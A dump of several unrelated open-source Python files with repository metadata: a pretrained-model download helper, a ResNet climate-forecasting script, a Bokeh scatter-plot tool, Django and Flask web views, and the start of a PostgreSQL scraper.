('ror3_56_cifar10', '0543', 'ee31a69a0503b41878c49d8925ac8e7ee813293b', 'v0.0.228'),
('ror3_56_cifar100', '2549', '4334559313cd9291af3d6ec0df144b21e695228b', 'v0.0.229'),
('ror3_56_svhn', '0269', '56617cf90e0902e88686af14939605c45d1170cf', 'v0.0.287'),
('ror3_110_cifar10', '0435', '0359916596cba01dfa481f105094c1047f592980', 'v0.0.235'),
('ror3_110_cifar100', '2364', 'b8c4d317241f54990180443d7fd9702d79c57ccc', 'v0.0.236'),
('ror3_110_svhn', '0257', '0677b7dfee32659a92719a5a16a7f387a5635f0b', 'v0.0.287'),
('ror3_164_cifar10', '0393', 'cc11aa06d928d0805279baccbf2b82371c31f503', 'v0.0.294'),
('ror3_164_cifar100', '2234', 'eb6a7fb8128240d84843a8e39adb00f606b6e2cf', 'v0.0.294'),
('ror3_164_svhn', '0273', 'b008c1b01386aca1803a1286607c5e1f843fc919', 'v0.0.294'),
('rir_cifar10', '0328', '5bed6f3506055b3ab5c4780a540cfebe014490ec', 'v0.0.292'),
('rir_cifar100', '1923', 'c42563834a971e18eacfc2287585aa2efa8af3eb', 'v0.0.292'),
('rir_svhn', '0268', '1c0718deaef5836efca4d5ded6140f0cd51424ab', 'v0.0.292'),
('shakeshakeresnet20_2x16d_cifar10', '0515', 'a7b8a2f77457e151da5d5ad3b9a2473594fecfc0', 'v0.0.215'),
('shakeshakeresnet20_2x16d_cifar100', '2922', 'e46e31a7d8308b57d9c0687000c40f15623998c2', 'v0.0.247'),
('shakeshakeresnet20_2x16d_svhn', '0317', '7a48fde5e1ccd5ff695892adf7094c15368ec778', 'v0.0.295'),
('shakeshakeresnet26_2x32d_cifar10', '0317', '21e60e626765001aaaf4eb26f7cb8f4a69ea3dc1', 'v0.0.217'),
('shakeshakeresnet26_2x32d_cifar100', '1880', 'bd46a7418374e3b3c844b33e12b09b6a98eb4e6e', 'v0.0.222'),
('shakeshakeresnet26_2x32d_svhn', '0262', 'f1dbb8ef162d9ec56478e2579272f85ed78ad896', 'v0.0.295'),
('resnet10_cub', '2765', '9dab9a498c380e6b7447827e00996d7cc61cc414', 'v0.0.335'),
('resnet12_cub', '2658', 'a46b8ec2d8dcd66a628dcfcb617acb15ef786b95', 'v0.0.336'),
('resnet14_cub', '2435', '0b9801b2e3aa3908bbc98f50d3ae3e986652742b', 'v0.0.337'),
('resnet16_cub', '2321', '031374ada9830869372a63e132c2477a04425444', 'v0.0.338'),
('ntsnet_cub', '1326', '75ae8cdcf4beb1ab60c1a983c9f143baaebbdea0', 'v0.0.334'),
('pspnet_resnetd101b_voc', '8144', 'e15319bf5428637e7fc00dcd426dd458ac937b08', 'v0.0.297'),
('pspnet_resnetd50b_ade20k', '3687', 'f0dcdf734f8f32a879dec3c4e7fe61d629244030', 'v0.0.297'),
('pspnet_resnetd101b_ade20k', '3797', 'c1280aeab8daa31c0893f7551d70130c2b68214a', 'v0.0.297'),
('pspnet_resnetd101b_cityscapes', '7172', 'd5ad2fa4c4208f439ab0b98267babe0c4d9e6e94', 'v0.0.297'),
('pspnet_resnetd101b_coco', '6741', '87582b79c48c4e995de808ff0cbc162c55b52031', 'v0.0.297'),
('deeplabv3_resnetd101b_voc', '8024', '8ee3099c5c983ef1cc0ce23b23d91db40b2986b8', 'v0.0.298'),
('deeplabv3_resnetd152b_voc', '8120', '88fb315dc3c58a84f325e63105fbfe322932073f', 'v0.0.298'),
('deeplabv3_resnetd50b_ade20k', '3713', '5d5e2f74008ab3637a05b6b1357c9c339296188c', 'v0.0.298'),
('deeplabv3_resnetd101b_ade20k', '3784', '6224836f8f31a00be1718a530a20670136bb3958', 'v0.0.298'),
('deeplabv3_resnetd101b_coco', '6773', '74dc9914078e47feb3ff64fba717d1d4040d8235', 'v0.0.298'),
('deeplabv3_resnetd152b_coco', '6899', 'edd79b4ca095f1674e7a68ee0dc8ed8bcd0b6a26', 'v0.0.298'),
('fcn8sd_resnetd101b_voc', '8040', 'f6c67c75bce4f9a3e17bf555369c0c9332ab5c1f', 'v0.0.299'),
('fcn8sd_resnetd50b_ade20k', '3339', '9856c5ee8186d1ac4b0eb5177c73e76c4cd63bb0', 'v0.0.299'),
('fcn8sd_resnetd101b_ade20k', '3588', '081774b2fb373d7b759cda2160fa0d2599b1c5f1', 'v0.0.299'),
('fcn8sd_resnetd101b_coco', '6011', '05e97cc5f5fcdf1c5ec5c617062d43adfe150d88', 'v0.0.299'),
]}
imgclsmob_repo_url = 'https://github.com/osmr/imgclsmob'
def get_model_name_suffix_data(model_name):
if model_name not in _model_sha1:
raise ValueError('Pretrained model for {name} is not available.'.format(name=model_name))
error, sha1_hash, repo_release_tag = _model_sha1[model_name]
return error, sha1_hash, repo_release_tag
def get_model_file(model_name,
local_model_store_dir_path=os.path.join('~', '.mxnet', 'models')):
"""
Return location for the pretrained on local file system. This function will download from online model zoo when
model cannot be found or has mismatch. The root directory will be created if it doesn't exist.
Parameters
----------
model_name : str
Name of the model.
local_model_store_dir_path : str, default $MXNET_HOME/models
Location for keeping the model parameters.
Returns
-------
file_path
Path to the requested pretrained model file.
"""
error, sha1_hash, repo_release_tag = get_model_name_suffix_data(model_name)
short_sha1 = sha1_hash[:8]
file_name = '{name}-{error}-{short_sha1}.params'.format(
name=model_name,
error=error,
short_sha1=short_sha1)
local_model_store_dir_path = os.path.expanduser(local_model_store_dir_path)
file_path = os.path.join(local_model_store_dir_path, file_name)
if os.path.exists(file_path):
if check_sha1(file_path, sha1_hash):
return file_path
else:
logging.warning('Mismatch in the content of model file detected. Downloading again.')
else:
logging.info('Model file not found. Downloading to {}.'.format(file_path))
if not os.path.exists(local_model_store_dir_path):
os.makedirs(local_model_store_dir_path)
zip_file_path = file_path + '.zip'
download(
url='{repo_url}/releases/download/{repo_release_tag}/{file_name}.zip'.format(
repo_url=imgclsmob_repo_url,
repo_release_tag=repo_release_tag,
file_name=file_name),
path=zip_file_path,
overwrite=True)
with zipfile.ZipFile(zip_file_path) as zf:
zf.extractall(local_model_store_dir_path)
os.remove(zip_file_path)
if check_sha1(file_path, sha1_hash):
return file_path
else:
raise ValueError('Downloaded file has different hash. Please try again.')
|
[
"osemery@gmail.com"
] |
osemery@gmail.com
|
3250ad1570e4e1fc2fe80c9dd17069f48f7b0791
|
96c2daf3ca0966191a29657cb444034a079880c5
|
/Scrap/CNN/ResNet50_test_lead_ann.py
|
63164ebac96ed50d5d3464b6e1d30ddacb8d9756
|
[] |
no_license
|
weilin2018/predict_amv
|
282c65ab7cbd59d0ae94a3903af015a5738f4566
|
2a2cc9c01e291992c2e97d40f47f4defe1566cd8
|
refs/heads/master
| 2023-03-27T06:00:23.551320
| 2021-03-26T02:42:17
| 2021-03-26T02:42:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,804
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
ResNet50 Test Lead, Annual
Train ResNet50 to forecast AMV Index at a set of lead times, given
normalized input from the CESM Large Ensemble
Can also indicate the region over which to predict the AMV Index
"""
import numpy as np
from tqdm import tqdm
import torch
from torch import nn
import torch.optim as optim
from torch.utils.data import DataLoader, TensorDataset
import torchvision.models as models
from torchvision import datasets, transforms as T
import os
import time
import copy
import matplotlib.pyplot as plt
## -------------
#%% User Edits
# -------------
allstart = time.time()
# Indicate machine to set path
machine='stormtrack'
# Set directory and load data depending on machine
if machine == 'local-glenn':
os.chdir('/Users/gliu/Downloads/2020_Fall/6.862/Project/predict_amv/CNN/')
outpath = '/Users/gliu/Downloads/2020_Fall/6.862/Project/'
else:
outpath = os.getcwd()
sst_normed = np.load('../../CESM_data/CESM_SST_normalized_lat_weighted.npy').astype(np.float32)
# Data preparation settings
leads = np.arange(0,25,1) # Time ahead (in years) to forecast AMV
resolution = '2deg' # Resolution of input (2deg or full)
season = 'Ann' # Season to take mean over
indexregion = 'NAT' # One of the following ("SPG","STG","TRO","NAT")
# Training/Testing Subsets
percent_train = 0.8 # Percentage of data to use for training (remaining for testing)
ens = 1 # Ensemble members to use
# Model training settings
max_epochs = 10
batch_size = 32 # Pairs of predictions
loss_fn = nn.MSELoss() # Loss Function
opt = ['Adadelta',0.1,0] # Name optimizer
# Set model architecture
netname = 'RN18'
resnet50 = models.resnet18(pretrained=True)
# model = nn.Sequential(nn.Conv2d(in_channels=channels, out_channels=3, kernel_size=(1,1),padding=(95,67)),
# resnet50,
# nn.Linear(in_features=1000,out_features=1))
#
# Options
debug= True # Visualize training and testing loss
verbose = False # Print loss for each epoch
#%% Functions
#
def train_CNN(layers,loss_fn,optimizer,trainloader,testloader,max_epochs,verbose=True):
"""
inputs:
layers - tuple of NN layers
loss_fn - (torch.nn) loss function
opt - tuple of [optimizer_name, learning_rate, weight_decay] for updating the weights
currently supports "Adadelta" and "SGD" optimizers
trainloader - (torch.utils.data.DataLoader) for training datasetmo
testloader - (torch.utils.data.DataLoader) for testing dataset
max_epochs - number of training epochs
verbose - set to True to display training messages
output:
dependencies:
from torch import nn,optim
"""
model = nn.Sequential(*layers) # Set up model
bestloss = np.infty
# Set optimizer
if optimizer[0] == "Adadelta":
opt = optim.Adadelta(model.parameters(),lr=optimizer[1],weight_decay=optimizer[2])
elif optimizer[0] == "SGD":
opt = optim.SGD(model.parameters(),lr=optimizer[1],weight_decay=optimizer[2])
elif optimizer[0] == 'Adam':
opt = optim.Adam(model.parameters(),lr=optimizer[1],weight_decay=optimizer[2])
train_loss,test_loss = [],[] # Preallocate tuples to store loss
for epoch in tqdm(range(max_epochs)): # loop by epoch
#for epoch in range(max_epochs):
for mode,data_loader in [('train',trainloader),('eval',testloader)]: # train/test for each epoch
if mode == 'train': # Training, update weights
model.train()
elif mode == 'eval': # Testing, freeze weights
model.eval()
runningloss = 0
for i,data in enumerate(data_loader):
# Get mini batch
batch_x, batch_y = data
# Set gradients to zero
opt.zero_grad()
# Forward pass
pred_y = model(batch_x).squeeze()
# Calculate losslay
loss = loss_fn(pred_y,batch_y.squeeze())
# Update weights
if mode == 'train':
loss.backward() # Backward pass to calculate gradients w.r.t. loss
opt.step() # Update weights using optimizer
## Investigate need for model.eval() in calculating train loss
# model.eval()
# # Forward pass
# pred_y = model(batch_x).squeeze()
# # Calculate loss
# loss = loss_fn(pred_y,batch_y.squeeze())
runningloss += loss.item()
#print("Runningloss %.2f"%runningloss)
if verbose: # Print message
print('{} Set: Epoch {:02d}. loss: {:3f}'.format(mode, epoch+1, \
runningloss/len(data_loader)))
if (runningloss/len(data_loader) < bestloss) and (mode == 'eval'):
bestloss = runningloss/len(data_loader)
bestmodel = copy.deepcopy(model)
if verbose:
print("Best Loss of %f at epoch %i"% (bestloss,epoch+1))
# Save running loss values for the epoch
if mode == 'train':
train_loss.append(runningloss/len(data_loader))
else:
test_loss.append(runningloss/len(data_loader))
return bestmodel,train_loss,test_loss
def calc_AMV_index(region,invar,lat,lon):
"""
Select bounding box for a given AMV region for an input variable
"SPG" - Subpolar Gyre
"STG" - Subtropical Gyre
"TRO" - Tropics
"NAT" - North Atlantic
Parameters
----------
region : STR
One of following the 3-letter combinations indicating selected region
("SPG","STG","TRO","NAT")
var : ARRAY [Ensemble x time x lat x lon]
Input Array to select from
lat : ARRAY
Latitude values
lon : ARRAY
Longitude values
Returns
-------
amv_index [ensemble x time]
AMV Index for a given region/variable
"""
# Select AMV Index region
bbox_SP = [-60,-15,40,65]
bbox_ST = [-80,-10,20,40]
bbox_TR = [-75,-15,0,20]
bbox_NA = [-80,0 ,0,65]
regions = ("SPG","STG","TRO","NAT") # Region Names
bboxes = (bbox_SP,bbox_ST,bbox_TR,bbox_NA) # Bounding Boxes
# Get bounding box
bbox = bboxes[regions.index(region)]
# Select Region
selvar = invar.copy()
klon = np.where((lon>=bbox[0]) & (lon<=bbox[1]))[0]
klat = np.where((lat>=bbox[2]) & (lat<=bbox[3]))[0]
selvar = selvar[:,:,klat[:,None],klon[None,:]]
# Take mean ove region
amv_index = np.nanmean(selvar,(2,3))
return amv_index
# ----------------------------------------
# %% Set-up
# ----------------------------------------
# Set experiment names ----
nvar = 4 # Combinations of variables to test
nlead = len(leads)
# Save data (ex: Ann2deg_NAT_CNN2_nepoch5_nens_40_lead24 )
expname = "%s%s_%s_%s_nepoch%02i_nens%02i_lead%02i" % (season,resolution,indexregion,netname,max_epochs,ens,len(leads)-1)
# Load the data for whole North Atlantic
sst_normed = np.load('../../CESM_data/CESM_sst_normalized_lat_weighted_%s_NAT_%s.npy' % (resolution,season)).astype(np.float32)
sss_normed = np.load('../../CESM_data/CESM_sss_normalized_lat_weighted_%s_NAT_%s.npy' % (resolution,season)).astype(np.float32)
psl_normed = np.load('../../CESM_data/CESM_psl_normalized_lat_weighted_%s_NAT_%s.npy' % (resolution,season)).astype(np.float32)
# Load lat/lon
lon = np.load("../../CESM_data/lon_%s_NAT.npy"%(resolution))
lat = np.load("../../CESM_data/lat_%s_NAT.npy"%(resolution))
nens,tstep,nlat,nlon = sst_normed.shape
# Preallocate Relevant Variables...
corr_grid_train = np.zeros((nlead))
corr_grid_test = np.zeros((nlead))
train_loss_grid = np.zeros((max_epochs,nlead))
test_loss_grid = np.zeros((max_epochs,nlead))
# ----------------------------------------------
# %% Train for each variable combination and lead time
# ----------------------------------------------
channels = 1
for v in range(nvar): # Loop for each variable
start = time.time()
if v == 0:
varname = 'SST'
invars = [sst_normed]
elif v == 1:
varname = 'SSS'
invars = [sss_normed]
elif v == 2:
varname = 'PSL'
invars = [psl_normed]
elif v == 3:
channels = 3
varname = 'ALL'
invars = [sst_normed,sss_normed,psl_normed]
outname = "/leadtime_testing_%s_%s.npz" % (varname,expname)
# Begin Loop
for l,lead in enumerate(leads):
start = time.time()
# Apply lead/lag to data
y = calc_AMV_index(indexregion,sst_normed[:ens,lead:,:,:],lat,lon)
y = y.reshape((y.shape[0]*y.shape[1]))[:,None]
X = np.transpose(np.array(invars)[:,:ens,0:tstep-lead,:,:].reshape(channels,(tstep-lead)*ens,nlat,nlon),
(1,0,2,3))
# Split into training and test sets
X_train = torch.from_numpy( X[0:int(np.floor(percent_train*(tstep-lead)*ens)),:,:,:] )
y_train = torch.from_numpy( y[0:int(np.floor(percent_train*(tstep-lead)*ens)),:] )
X_val = torch.from_numpy( X[int(np.floor(percent_train*(tstep-lead)*ens)):,:,:,:] )
y_val = torch.from_numpy( y[int(np.floor(percent_train*(tstep-lead)*ens)):,:] )
# Put into pytorch DataLoader
train_loader = DataLoader(TensorDataset(X_train, y_train), batch_size=batch_size)
val_loader = DataLoader(TensorDataset(X_val, y_val), batch_size=batch_size)
# Load resnet
resnet50 = models.resnet50(pretrained=True)
layers = [nn.Conv2d(in_channels=channels, out_channels=3, kernel_size=(1,1),padding=(95,67)),
resnet50,
nn.Linear(in_features=1000,out_features=1)]
# Train CNN
model,trainloss,testloss = train_CNN(layers,loss_fn,opt,train_loader,val_loader,max_epochs,verbose=verbose)
# Save train/test loss
train_loss_grid = np.array(trainloss)# Take minum of each epoch
test_loss_grid = np.array(testloss)
# Evalute the model
model.eval()
y_pred_val = model(X_val).detach().numpy()
y_valdt = y_val.detach().numpy()
y_pred_train = model(X_train).detach().numpy()
y_traindt = y_train.detach().numpy()
# Get the correlation (save these)
traincorr = np.corrcoef( y_pred_train.T[0,:], y_traindt.T[0,:])[0,1]
testcorr = np.corrcoef( y_pred_val.T[0,:], y_valdt.T[0,:])[0,1]
if np.isnan(traincorr) | np.isnan(testcorr):
if debug:
fig,ax=plt.subplots(1,1)
plt.style.use('seaborn')
ax.plot(trainloss[1:],label='train loss')
ax.plot(testloss[1:],label='test loss')
ax.legend()
ax.set_title("Losses for Predictor %s Leadtime %i"%(varname,lead))
plt.show()
fig,ax=plt.subplots(1,1)
plt.style.use('seaborn')
#ax.plot(y_pred_train,label='train corr')
ax.plot(y_pred_val,label='test corr')
ax.plot(y_valdt,label='truth')
ax.legend()
ax.set_title("Correlation for Predictor %s Leadtime %i"%(varname,lead))
plt.show()
print("Warning, NaN Detected for lead %i of %i. Stopping!" % (lead,len(leads)))
break
# Calculate Correlation and RMSE
corr_grid_test = np.corrcoef( y_pred_val.T[0,:], y_valdt.T[0,:])[0,1]
corr_grid_train = np.corrcoef( y_pred_train.T[0,:], y_traindt.T[0,:])[0,1]
# Save the model
modout = "%s%s_%s_lead%i.pt" %(outpath,expname,varname,lead)
torch.save(model.state_dict(),modout)
# Save Data
outname = "/leadtime_testing_%s_%s_lead%02i.npz" % (varname,expname,lead)
np.savez(outpath+outname,**{
'train_loss': train_loss_grid,
'test_loss': test_loss_grid,
'test_corr': corr_grid_test,
'train_corr': corr_grid_train}
)
if debug:
fig,ax=plt.subplots(1,1)
plt.style.use('seaborn')
ax.plot(trainloss[1:],label='train loss')
ax.plot(testloss[1:],label='test loss')
ax.legend()
ax.set_title("Losses for Predictor %s Leadtime %i"%(varname,lead))
plt.show()
fig,ax=plt.subplots(1,1)
plt.style.use('seaborn')
#ax.plot(y_pred_train,label='train corr')
ax.plot(y_pred_val,label='test corr')
ax.plot(y_valdt,label='truth')
ax.legend()
ax.set_title("Correlation for Predictor %s Leadtime %i"%(varname,lead))
plt.show()
print("\nCompleted training for lead %i of %i in %.2fs" % (lead,len(leads),time.time()-start))
print("Saved data to %s%s. Script ran to completion in %ss"%(outpath,outname,time.time()-start))
|
[
"glenn.y.liu@gmail.com"
] |
glenn.y.liu@gmail.com
|
1078df92752f26a966e20cd0f21e05fcdd32c400
|
df1482f251a2d801e7b77bbd1d5c9a408e71e7ef
|
/05_visualization/plot_interactive_scatter.py
|
36e98b4e9ec6447f6dc83c224b9918ce2a0b96ee
|
[] |
no_license
|
silvewheat/bioNotes
|
a34e1aa79df42799d83b5c4f3e1b2a583360fc1a
|
d96c4710c1f620c18fdf92fe21f38d73671b9580
|
refs/heads/master
| 2021-12-30T01:52:40.925861
| 2021-12-27T14:11:30
| 2021-12-27T14:11:30
| 113,825,423
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,115
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 9 17:00:44 2018
@author: Caiyd
"""
import json
import click
import pandas as pd
import seaborn as sns
from bokeh.plotting import figure, ColumnDataSource, output_file, save
from bokeh.models import HoverTool, BoxZoomTool, ResetTool, WheelZoomTool, PanTool, SaveTool, ZoomInTool, ZoomOutTool
def load_dataset(datafile, xcol: str, ycol: str, tags: tuple, groupby):
"""
tabular形式有header
tab分割
"""
cols = list(tags) + [xcol, ycol]
if groupby:
cols.append(groupby)
df = pd.read_csv(datafile, sep='\t', usecols=cols)
print(df.head())
return df
def plot(df, xcol, ycol, tags, groupby, colors, outprefix):
output_file(f'{outprefix}.html')
tooltips = [(f"({xcol},{ycol})", f"(@{xcol}, @{ycol})")]
for tag in tags:
tooltips.append((f"{tag}", f"@{tag}"))
hover = HoverTool(tooltips=tooltips)
p = figure(title="", tools=[hover, BoxZoomTool(), ResetTool(), WheelZoomTool(), PanTool(), SaveTool(), ZoomInTool(), ZoomOutTool()],
toolbar_location="below", toolbar_sticky=False,
plot_width=800, plot_height=600,
x_axis_label=xcol, y_axis_label=ycol)
if groupby:
for ngroup, group in enumerate(df[groupby].unique()):
if type(colors) == dict:
color = colors[group]
else:
color = colors[ngroup]
source = ColumnDataSource(df.loc[df[groupby] == group, :])
p.circle(x=xcol, y=ycol, size=10, alpha=1,
color=color, source=source, legend=group)
p.legend.location = "top_left"
p.legend.click_policy="hide"
else:
source = ColumnDataSource(df)
p.circle(x=xcol, y=ycol, size=10, alpha=0.8,
color=colors, source=source)
save(p)
@click.command()
@click.option('--datafile', help='用于绘图的数据文件, tsv格式, 第一行为header')
@click.option('--xcol', help='x轴上展示的变量(header中的一个字段名)')
@click.option('--ycol', help='y轴上展示的变量')
@click.option('--tags', '-t', help='每个数据点需要展示的标签字段名(可多选, e.g -t IID -t GID)', multiple=True)
@click.option('--groupby', help='根据某一字段来分类, 标注不同颜色, default is False', default=False, type=str)
@click.option('--groupcolor', help='json格式文件,配置不同组的颜色,不指定则用内置配置', default=False)
@click.option('--outprefix', help='输出html文件的前缀(输出{outprefix}.html)')
def main(datafile, xcol, ycol, tags, groupby, groupcolor, outprefix):
"""
交互式散点图
"""
df = load_dataset(datafile, xcol, ycol, tags, groupby)
if groupby:
ngroup = len(df[groupby].unique())
if groupcolor:
with open(groupcolor) as f:
colors = json.load(f)
else:
colors = sns.color_palette("Set2", ngroup).as_hex()
else:
colors = 'blue'
plot(df, xcol, ycol, tags, groupby, colors, outprefix)
if __name__ == '__main__':
main()
|
[
"silverwheat@163.com"
] |
silverwheat@163.com
|
6b50f463d5aae81034a63640b931851a10de45d4
|
ca0f021e8f872a4a9ba5ef4e1ceb60bd6b0f5f1d
|
/bnotes/views.py
|
41aeff996e53472d8a99303f02c4f168e5c82141
|
[] |
no_license
|
RitikPatle/Bnotes-Minor1
|
490409d98b36535f679150eefe1b1fd0732daaed
|
3dbf4b1b95a894b46302dfa99bc3dd532affe2ae
|
refs/heads/master
| 2023-04-30T20:59:21.374543
| 2021-05-12T09:15:24
| 2021-05-12T09:15:24
| 366,656,100
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,568
|
py
|
from .models import *
from django.shortcuts import render,redirect
# Create your views here.
def index(request):
return render(request,'index.html')
def notes(request):
subs=Notes.objects.all()
return render(request,'notes.html',{'subs':subs})
def cs(request):
obj1=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","1"])
obj2=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","2"])
obj3=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","3"])
obj4=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","4"])
obj5=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","5"])
obj6=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","6"])
obj7=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","7"])
obj8=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","8"])
return render(request,'subn.html',{'streamname':'Computer Science Engineering','obj1':obj1,'obj2':obj2,'obj3':obj3,'obj4':obj4,'obj5':obj5,'obj6':obj6,'obj7':obj7,'obj8':obj8})
def me(request):
obj1=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","1"])
obj2=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","2"])
obj3=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","3"])
obj4=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","4"])
obj5=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","5"])
obj6=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","6"])
obj7=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","7"])
obj8=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","8"])
return render(request,'subn.html',{'streamname':'Mechanical Engineering','obj1':obj1,'obj2':obj2,'obj3':obj3,'obj4':obj4,'obj5':obj5,'obj6':obj6,'obj7':obj7,'obj8':obj8})
def papers(request):
psubs=Papers.objects.all()
return render(request,'papers.html',{'psubs':psubs})
def pcs(request):
objp1=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","1"])
objp2=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","2"])
objp3=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","3"])
objp4=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","4"])
objp5=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","5"])
objp6=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","6"])
objp7=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","7"])
objp8=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","8"])
return render(request,'subp.html',{'streamname':'Computer Science Engineering','objp1':objp1,'objp2':objp2,'objp3':objp3,'objp4':objp4,'objp5':objp5,'objp6':objp6,'objp7':objp7,'objp8':objp8})
def pme(request):
objp1=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","1"])
objp2=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","2"])
objp3=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","3"])
objp4=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","4"])
objp5=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","5"])
objp6=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","6"])
objp7=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","7"])
objp8=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","8"])
return render(request,'subp.html',{'streamname':'Mechanical Engineering','objp1':objp1,'objp2':objp2,'objp3':objp3,'objp4':objp4,'objp5':objp5,'objp6':objp6,'objp7':objp7,'objp8':objp8})
def about(request):
return render(request,'about.html')
def contact(request):
return render(request,'cu.html')
def feedback(request):
if request.method == 'POST':
post=Post()
post.name=request.POST["name"]
post.email=request.POST["email"]
post.mobno=request.POST["mobno"]
post.comments=request.POST["comments"]
post.save()
return redirect('contact')
|
[
"ritik.patle.000@gmail.com"
] |
ritik.patle.000@gmail.com
|
eb1ebfc16b9a38b3d2a5ad94b96850723860d3c8
|
02248796a099a07411557a84ce49d239ecbeffe5
|
/randomRoll/matrix.py
|
a8ccd98f8b734d0ef0ca8e6d3c8ac3a9b8023c43
|
[] |
no_license
|
HarrisonHelms/helms
|
d75699ef6dea4701c9d168407f449de155c4be99
|
fee008e752b42a81ef467c3e865eddc72894387b
|
refs/heads/master
| 2021-09-04T04:41:16.896631
| 2018-01-15T23:24:15
| 2018-01-15T23:24:15
| 109,761,616
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 285
|
py
|
from random import random
def roll():
return round(random() * 839842908294839849839834983499876543234598349898398349349834986332784983873983083972502793270934843908)
#set roll() equal to rolled before you print it so you dont have to print a function
rolled = roll()
print(rolled)
|
[
"harrisonhelms@Harrisons-MacBook-Air.local"
] |
harrisonhelms@Harrisons-MacBook-Air.local
|
fa2a4673612d10290d0647f4e530246358165a25
|
5c236dd226a3f8c85a5f3d2f9e23f4cf1b82b320
|
/flaskapp/views.py
|
65f8ed7c1f487d0d89884bae5be00166736d3f9f
|
[
"MIT"
] |
permissive
|
jsbridge/makemecurly
|
2160f6491b5a44140bfc94a9cda4964177915852
|
c4fd7edb14f3a3a4d5d53f6da6d65fefc702f0b3
|
refs/heads/master
| 2020-12-14T15:40:46.245352
| 2020-02-27T02:46:07
| 2020-02-27T02:46:07
| 234,792,190
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,680
|
py
|
from flask import Flask, render_template
from flask import request, url_for, send_from_directory
from werkzeug.utils import secure_filename
from flaskapp import app
from model_image import *
from query import *
import os
upload_folder = 'flaskapp/static/uploads'
app.config['UPLOAD_FOLDER'] = upload_folder
allowed_ext = set(['png', 'jpg', 'jpeg', 'gif'])
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in allowed_ext
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
# Check to see if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# If the user does not select a file
if file.filename == '':
flash('No selected file')
return redirect(request.url)
# If everything looks good, proceed
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
file.save(filepath)
predicted_class = predict_class(filepath)
# List of classes not used in this app
bad_list = ['straight', 'unsure','braids','dreadlocks','nonhair', 'short']
if predicted_class in bad_list:
return render_template('complete.html', predicted_class = predicted_class)
# Query the product database, return products and amazon URLS for products
prods, urls = query(predicted_class)
shampoo,conditioner,leavein,gel,deep,protein,cream,serum,clarify = prods
ushampoo,uconditioner,uleavein,ugel,udeep,uprotein,ucream,userum,uclarify = urls
# Passes hair class, products, and URLS to the second HTML page
return render_template('complete.html', predicted_class = predicted_class,
shampoo = shampoo, conditioner = conditioner,
leavein = leavein, gel = gel, deep = deep, protein = protein,
cream = cream, serum = serum, clarify = clarify, ushampoo = ushampoo,
uconditioner = uconditioner, uleavein = uleavein,ugel = ugel,
udeep = udeep, ucream = ucream, userum = userum, uprotein = uprotein,
uclarify = uclarify)
return redirect(url_for('main'))
return render_template('main.html')
|
[
"jsbridge45@gmail.com"
] |
jsbridge45@gmail.com
|
313db866197ccc1a9b1e058d3d4b9be177dcc62f
|
7f48a52924cc0069090afddac0ff2d103acd107a
|
/index_frorum.py
|
93692ab31205e7e6aaf30fbfd4b6842d63cb304f
|
[] |
no_license
|
frobese/bs4-template
|
bbb63086224498a2b16fb355014f9f27a3afc395
|
b18e20fe8d8e5e2bbe97346f5f1f1fdb838a57b9
|
refs/heads/master
| 2023-03-29T01:43:41.869228
| 2020-07-17T20:00:16
| 2020-07-17T20:00:16
| 290,730,726
| 0
| 0
| null | 2021-03-31T20:20:57
| 2020-08-27T09:15:23
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 958
|
py
|
import re
import psycopg2
import urllib.request as req
from bs4 import BeautifulSoup as bs
# Verbindung zur DB herstellen
conn = psycopg2.connect("dbname=frorum_db user=frorum password=sicheresPasswort")
cur = conn.cursor()
cur.execute("SELECT version()")
print("Verbindung zu %s hergestellt" % cur.fetchone())
# Verbindung zum Server herstellen und HTML-Datei laden
